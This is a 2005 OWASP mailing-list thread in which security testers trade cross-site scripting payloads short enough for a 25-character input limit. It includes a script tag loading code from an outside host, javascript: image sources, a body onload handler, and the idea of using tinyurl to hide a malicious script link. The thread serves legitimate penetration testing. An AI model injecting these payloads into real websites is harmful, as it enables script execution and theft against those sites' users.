[OWASP-Chapters] Re: [OWASP-TESTING] XSS in 25 characters or less

E. Kellinis e.kellinis at gmail.com
Thu May 19 06:48:34 EDT 2005


try this one
<body onload=alert()>


On 5/19/05, Stephen Venter <stephen.venter at gmail.com> wrote:
> Yeah, quite right... well, almost - just needed a space and an extra slash:
> <img src=javascript:alert() />
> 
> 
> On 5/19/05, Alex Smolen <alsmola at yahoo.com> wrote:
> > <html>
> > <head>
> > </head>
> > <body>
> > <img src=javascript:alert()>
> > </body>
> > </html>
> >
> > This should work in internet explorer
> > --- Stephen Venter <stephen.venter at gmail.com> wrote:
> > > Eoin
> > >
> > > I tried setting up a symbolic link with only a
> > > single character to a
> > > js file and an html file on my website... but the
> > > domain name is still
> > > too long for your 25 char restriction.  However,
> > > strictly speaking,
> > > I'd say that, if all you need is to prove
> > > susceptibility to XSS, then
> > > you could use something simple like inputting text
> > > with HTML bold
> > > tags... would you agree? Although that does
> > > obviously not demonstrate
> > > the risk quite as nicely.
> > >
> > > Anyway, here are some XSS examples I like to use:
> > > http://whoozoo.co.uk/XSS-test.htm
> > > or: the symlink to that html file is:
> > > http://whoozoo.co.uk/x [works ok
> > > for XSS so long as the client is using IE]
> > >
> > > There you will see links to the js file that I
> > > symlinked to the single char "j".
> > >
> > > Alex, can you show a working example of using "img
> > > src=" in the way
> > > you describe?
> > >
> > > Regards
> > > Steve
> > >
> > > On 5/18/05, Alex Smolen <alsmola at yahoo.com> wrote:
> > > > Actually, you could include the  <img
> > > > src=tinyurl.com/whatever>
> > > > and have the tiny url point to a java script
> > > > somewhere.
> > > >
> > > > Do I get my pint?
> > > > --- Alex Smolen <alsmola at yahoo.com> wrote:
> > > > > You could use tinyurl.com to embed a malicious
> > > link
> > > > > (say, one that executes a XST attack). This
> > > still
> > > > > requires a windows larger than 25 to get the
> > > domain
> > > > > to
> > > > > execute a malicious XSS, I think.
> > > > >
> > > > > --- Eoin Keary <eoinkeary at hotmail.com> wrote:
> > > > > > Hi,
> > > > > > I have a window of 25 chars to perform a XSS
> > > > > > exploit.
> > > > > > anything more is truncated by the server.
> > > > > >
> > > > > > <script src=http://a.com/z.js></script>
> > > > > >
> > > > > > - this is 39 chars
> > > > > > We can do HTML injection ("<a href=....") to a
> > > > > > degree but anyone any ideas
> > > > > > on how to execute script in such a small
> > > window
> > > > > (25
> > > > > > chars)?
> > > > > > we need to stay in the same domain (xyz.com)
> > > > > inorder
> > > > > > to make the attack
> > > > > > useful. so redirecting to another domain with
> > > the
> > > > > > "<a href..." is no good.
> > > > > >
> > > > > > First correct answer gets a pint of Guinness
> > > > > (Larry
> > > > > > S, you're not included
> > > > > > for the pint as I owe you too many).
> > > > > >
> > > > > > Eoin
> > >
> >
> 
> 
> --
> Stephen Venter
> Independent IT Security Consultant
> stephen.venter at gmail.com
> www.whoozoo.co.uk
> 
> 
> -------------------------------------------------------
> This SF.Net email is sponsored by Oracle Space Sweepstakes
> Want to be the first software developer in space?
> Enter now for the Oracle Space Sweepstakes!
> http://ads.osdn.com/?ad_idt12&alloc_id344&opclick
> _______________________________________________
> OWASP-Chapters mailing list
> OWASP-Chapters at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>




More information about the Owasp-testing mailing list